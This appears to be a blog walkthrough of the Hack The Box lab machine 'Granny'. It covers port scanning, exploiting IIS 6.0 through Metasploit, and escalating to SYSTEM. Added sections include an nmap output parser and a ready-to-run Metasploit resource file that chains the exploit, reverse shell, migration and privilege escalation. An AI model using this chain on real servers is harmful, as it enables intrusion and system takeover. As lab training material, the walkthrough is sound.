EAkl Blog

Granny Walkthrough


Last updated 2 years ago

Hey folks, we are back with another Hack The Box machine, "Granny". It depends on exploiting a known vulnerability in the web server and then on Windows privilege escalation, but before we get started let's take a look at its info card.

That's good, it's rated easy, but you will learn a few new things about Windows privilege escalation. Let's get started...

Nmap scan

In this step we discover the open ports, the services running on them, OS detection results and more:

nmap -A -T4 -oG granny.gnmap <machine-ip>

Only port 80 is open, running Microsoft IIS 6.0 (the IIS version that ships with Windows Server 2003), and nothing else.

Browsing to http://10.10.10.15 gives nothing useful, so let's look for hidden directories with dirbuster, dirsearch, ffuf, gobuster or any tool you prefer.

We find a few more directories, but none of them holds useful information, so let's move on to the next step.
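As an added example (not part of the original post), here is a small POSIX shell helper that parses the grepable report nmap writes with -oG and lists one line per open port, so the "only port 80, IIS 6.0" finding can be confirmed from the file rather than by reading the full -A output. The sample granny.gnmap content is constructed to mirror that scan; the file name is an assumption.

```shell
#!/bin/sh
# Parse nmap grepable output (-oG) and list open ports with their services.
# Added example for this write-up; the sample report below is constructed to
# mirror the Granny scan (only 80/tcp open, "Microsoft IIS httpd 6.0").
set -eu

# Print "port/proto service version" for every open port in a .gnmap file.
# nmap -oG puts all ports of a host on one tab-separated "Host:" line whose
# "Ports:" field lists entries as port/state/proto/owner/service/rpc/version/,
# separated by ", ".
open_ports_from_gnmap() {
    awk -F'\t' '
        /^Host: / {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, entry, ", ")
                    for (j = 1; j <= n; j++) {
                        split(entry[j], f, "/")
                        if (f[2] == "open")
                            printf "%s/%s %s %s\n", f[1], f[3], f[5], f[7]
                    }
                }
            }
        }' "$1"
}

# Number of open ports; with a single HTTP port, web enumeration is the only avenue.
open_port_count() {
    open_ports_from_gnmap "$1" | wc -l | tr -d ' '
}

# Constructed sample in the exact shape nmap -A -oG writes for this host.
write_sample_gnmap() {
    {
        printf '# Nmap scan initiated as: nmap -A -T4 -oG granny.gnmap 10.10.10.15\n'
        printf 'Host: 10.10.10.15 ()\tStatus: Up\n'
        printf 'Host: 10.10.10.15 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 6.0/\tIgnored State: filtered (999)\n'
        printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
    } > "$1"
}

main() {
    f="${1:-}"
    # No report given: build the constructed sample so the script runs offline.
    if [ -z "$f" ]; then
        f="$(mktemp)"
        write_sample_gnmap "$f"
    fi
    printf 'open ports: %s\n' "$(open_port_count "$f")"
    open_ports_from_gnmap "$f"
}

main "$@"
```

Run it as `sh parse_gnmap.sh granny.gnmap` against a real report. When the only result is an HTTP port with a product banner, the next two commands in this write-up's flow would be a directory brute force (for example `gobuster dir -u http://10.10.10.15/ -w <wordlist>`) and a banner lookup such as `searchsploit "iis 6.0"`; both command lines are assumptions, not the post's own.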

Let's search for an exploit for the running service, on Google or with the searchsploit tool.

The good news: the same exploit exists both on exploit-db and as a Metasploit module.

Let's search for it in Metasploit, select it, and set its options (the target host, plus the LHOST and LPORT our listener will use).

After setting these options, type run to get a meterpreter session.

Good, we have a session. Type getuid to see who we are, or shell to drop into a Windows command prompt on the target and check our privileges from there (shell does not open a new connection; it runs inside the existing meterpreter session).

Unfortunately we only have a low-privileged account, so let's look for user.txt and then work on getting root (SYSTEM) access.

Let's go to the Documents and Settings directory and try to enter a user's directory.

We can't open any of them!

Okay, let's try to get root access.

Put this session in the background by typing background, note the <session-id> it reports, and then search for the local exploit suggester module (post/multi/recon/local_exploit_suggester), which checks which local exploits our target is likely to be vulnerable to.

Set SESSION to that session number, as you can see, and run it.

Nice, we get a list of candidate exploits, and you should try every one of them. I'll try the last one first.

Good, it's a privilege escalation module, let's try it.

Unfortunately the module fails against our target, so let's go back into the session and look at which process our session is living in:

  • sessions -i <session-id> → return to the existing session

  • ps → list the running processes

Our session runs inside the IIS worker process we exploited, which is a poor host for a local exploit. Note wmiprvse.exe: ps shows it running as the same user as our session, so we can move into it with migrate <process-id> and get a stable process to run the exploit from.

Okay, let's return to our module and try to run it again.

One more thing: set LPORT to a port other than the one the first session's handler is using, otherwise the new handler cannot bind to it and the exploit fails.

As you can see we're SYSTEM (full administrative privileges) now, so grabbing the user and root flags is easy.
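The whole Metasploit sequence above (exploit, background, suggester, migrate, re-run the local exploit on a different LPORT) fits in one msfconsole resource file, which avoids retyping it when the session dies. This is an added example, not the post's own commands, and it carries several assumptions: the IIS 6.0 WebDAV module named below (the post does not name the module it used), LHOST bound to the tun0 VPN interface, a fresh console so the first session is id 1 and the elevated one is id 2, and a placeholder for whichever local exploit you picked from the suggester's output.

```text
# granny.rc -- run with: msfconsole -q -r granny.rc
# Added example for this write-up, not the original post's commands.
# Assumptions: module name below, LHOST on tun0, session ids 1 and 2,
# and <privesc-module-from-suggester> replaced by your chosen local exploit.

# Stage 1: initial foothold on the IIS 6.0 web server
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS 10.10.10.15
set LHOST tun0
set LPORT 4444
# -z: return to the console once the session is up instead of interacting with it
exploit -z

# Stage 2: ask the suggester which local exploits this session is a candidate for
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# Stage 3: leave the IIS worker process before running a local exploit.
# sessions -C runs one meterpreter command on the given session;
# migrate -N migrates by process name instead of pid.
sessions -i 1 -C "migrate -N wmiprvse.exe"

# Stage 4: the local exploit starts its own handler, so it must use a
# different LPORT than the 4444 handler from stage 1 or the bind fails.
use <privesc-module-from-suggester>
set SESSION 1
set LHOST tun0
set LPORT 4445
exploit -z

# Confirm the new session is elevated
sessions -i 2 -C "getuid"
```

Replace the placeholder with the exploit the suggester reported before running the file; msfconsole executes the lines in order and stops interacting at each exploit -z, so the stage 4 handler is already listening on 4445 when the migrated session triggers it.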
